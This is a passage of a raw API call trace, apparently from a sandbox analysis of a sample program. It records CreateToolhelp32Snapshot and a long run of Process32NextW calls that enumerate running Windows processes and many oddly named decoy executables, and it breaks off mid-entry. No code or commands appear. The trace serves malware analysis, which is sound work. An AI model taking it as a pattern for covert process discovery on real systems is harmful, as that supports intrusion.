hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c20f8 | out: hHeap=0x5d0000) returned 1 [0067.840] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x39c [0068.524] Process32FirstW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0068.524] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0068.525] lstrlenW (lpString="System") returned 6 [0068.525] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0068.526] lstrlenW (lpString="smss.exe") returned 8 [0068.526] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0068.527] lstrlenW (lpString="csrss.exe") returned 9 [0068.527] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0068.527] lstrlenW (lpString="wininit.exe") returned 11 [0068.527] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0068.528] lstrlenW (lpString="csrss.exe") returned 9 [0068.528] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0068.529] lstrlenW (lpString="winlogon.exe") returned 12 [0068.529] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0068.530] lstrlenW (lpString="services.exe") returned 12 [0068.530] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0068.531] lstrlenW (lpString="lsass.exe") returned 9 [0068.531] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.531] lstrlenW (lpString="svchost.exe") returned 11 [0068.532] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0068.532] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0068.532] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0068.533] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0068.533] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.534] lstrlenW (lpString="svchost.exe") returned 11 [0068.534] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0068.534] lstrlenW (lpString="dwm.exe") returned 7 [0068.534] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x53, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.535] lstrlenW (lpString="svchost.exe") returned 11 [0068.535] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.536] lstrlenW (lpString="svchost.exe") returned 11 [0068.536] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.536] lstrlenW (lpString="svchost.exe") returned 11 [0068.537] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.537] lstrlenW (lpString="svchost.exe") returned 11 [0068.537] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.538] lstrlenW (lpString="svchost.exe") returned 11 [0068.538] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.539] lstrlenW (lpString="svchost.exe") returned 11 [0068.539] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.539] lstrlenW (lpString="svchost.exe") returned 11 [0068.539] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.540] lstrlenW (lpString="svchost.exe") returned 11 [0068.540] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.541] lstrlenW (lpString="svchost.exe") returned 11 [0068.541] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0068.541] lstrlenW (lpString="spoolsv.exe") returned 11 [0068.541] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.542] lstrlenW (lpString="svchost.exe") returned 11 [0068.542] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.543] lstrlenW (lpString="svchost.exe") returned 11 [0068.543] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0068.544] lstrlenW (lpString="audiodg.exe") returned 11 [0068.544] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0068.547] lstrlenW (lpString="sihost.exe") returned 10 [0068.547] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.548] lstrlenW (lpString="svchost.exe") returned 11 [0068.548] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0068.548] lstrlenW (lpString="taskhostw.exe") returned 13 [0068.549] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0068.549] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0068.549] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0068.550] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0068.550] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x42, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0068.551] lstrlenW (lpString="explorer.exe") returned 12 [0068.551] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0068.551] lstrlenW (lpString="Memory Compression") returned 18 [0068.551] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0068.552] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0068.552] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0068.553] lstrlenW (lpString="SearchUI.exe") returned 12 [0068.553] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0068.554] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0068.554] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0068.555] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0068.555] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0068.556] lstrlenW (lpString="taskhostw.exe") returned 13 [0068.556] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0068.556] lstrlenW (lpString="UsoClient.exe") returned 13 [0068.556] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0068.557] lstrlenW (lpString="taskhostw.exe") returned 13 [0068.557] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0068.558] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0068.558] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0068.558] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0068.558] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0069.222] lstrlenW (lpString="msoia.exe") returned 9 [0069.222] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0069.229] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0069.229] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0069.230] lstrlenW (lpString="screensaver.exe") returned 15 [0069.230] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0069.230] lstrlenW (lpString="xml upper.exe") returned 13 [0069.230] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0069.259] lstrlenW (lpString="defeat preston.exe") returned 18 [0069.259] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0069.260] lstrlenW (lpString="boss isolated.exe") returned 17 [0069.260] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0069.285] lstrlenW (lpString="member.exe") returned 10 [0069.285] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0069.286] lstrlenW (lpString="chubby-er.exe") returned 13 [0069.286] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0069.286] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0069.286] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0069.287] lstrlenW (lpString="organization.exe") returned 16 [0069.287] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0069.288] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0069.288] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0069.288] lstrlenW (lpString="spray-roman.exe") returned 15 [0069.288] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0069.289] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0069.289] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0069.298] lstrlenW (lpString="tank attacks.exe") returned 16 [0069.298] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0069.306] lstrlenW (lpString="wires jacket.exe") returned 16 [0069.306] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0069.307] lstrlenW (lpString="values.exe") returned 10 [0069.307] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0069.308] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0069.308] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0069.308] lstrlenW (lpString="printersaerospace.exe") returned 21 [0069.308] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0069.309] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0069.309] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0069.328] lstrlenW (lpString="dllhost.exe") returned 11 [0069.328] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0069.329] lstrlenW (lpString="joke.exe") returned 8 [0069.329] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0069.330] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0069.330] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0069.331] lstrlenW (lpString="documents.exe") returned 13 [0069.331] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0069.332] lstrlenW (lpString="rebel.exe") returned 9 [0069.332] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0069.333] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0069.333] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0069.333] lstrlenW (lpString="conhost.exe") returned 11 [0069.333] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0069.334] lstrlenW (lpString="conhost.exe") returned 11 [0069.334] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 